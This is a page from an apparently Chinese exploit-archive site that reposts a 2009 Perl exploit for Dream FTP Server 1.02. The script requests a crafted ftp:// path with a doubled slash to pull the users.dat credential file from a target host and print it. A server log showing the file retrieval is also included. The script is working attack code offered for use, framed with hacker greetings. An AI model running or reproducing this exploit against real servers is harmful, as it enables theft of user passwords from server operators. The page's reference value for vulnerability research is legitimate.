首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit
来源:WwW.No-Exploit.CoM 作者:Cyber-Zone 发布时间:2009-04-24  

#!/usr/bin/perl -w
#
# This Bug Similar to others found By My Friend : Stack <= so special Thanx
# So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
# But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat
# In This Exploit I Used The Port 80 You can use any port you want 21
#################################################################################################################################
#23/04/2009 13:20:25  FTP Server started on port 80.
#23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server
#23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004
#23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220 
#23/04/2009 13:25:43  [0000000002] USER anonymous
#23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous
#23/04/2009 13:25:43  [0000000002] PASS **********
#23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.
#23/04/2009 13:25:43  [0000000002] PWD
#23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.
#23/04/2009 13:25:43  [0000000002] TYPE I
#23/04/2009 13:25:43  [0000000002] 200 Type set to I
#23/04/2009 13:25:43  [0000000002] CWD Program Files
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
#23/04/2009 13:25:43  [0000000002] CWD BolinTech
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
#23/04/2009 13:25:43  [0000000002] MDTM users.dat
#23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.
#23/04/2009 13:25:43  [0000000002] PASV
#23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
#23/04/2009 13:25:43  [0000000002] RETR users.dat
#23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
#23/04/2009 13:25:43  [0000000002] 226 Transfer complete
#23/04/2009 13:25:43  [0000000002] Client disconnected from 127.0.0.1.
#################################################################################################################################
# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
#################################################################################################################################
# welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
#################################################################################################################################
# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
#################################################################################################################################
use LWP::Simple;
use LWP::UserAgent;

print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 3)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port \n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";
}
($HackerName, $TargetIP, $AttackedPort) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print("          ******************************\n");
print("          *             Status         *\n");
print("          ******************************\n");
print("$HackerName , AttaCking The Target : $TargetIP \n");
print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
$terget1="Program Files";
$target2="BolinTech";
$target3="users.dat";
$slash="/";
$TargetFile=$terget1.$slash.$target2.$slash.$target3;
$temp="/" x 2;
my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Home Web Server <= r1.7.1 (bui
·Popcorn 1.87 Remote Heap Overf
·Norton Ghost Support module fo
·CoolPlayer Portable 2.19.1 (Sk
·Zervit HTTP Server <= 0.3 (soc
·CoolPlayer Portable 2.19.1 (m3
·Absolute Form Processor XE-V 1
·SDP Downloader v2.3.0 (.ASX Fi
·PJblog V3.0 0day+EXP
·Microsoft Internet Infomation
·linux内核CAP_KILL校验本地提权
·libvirt_proxy <= 0.5.1 Local P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved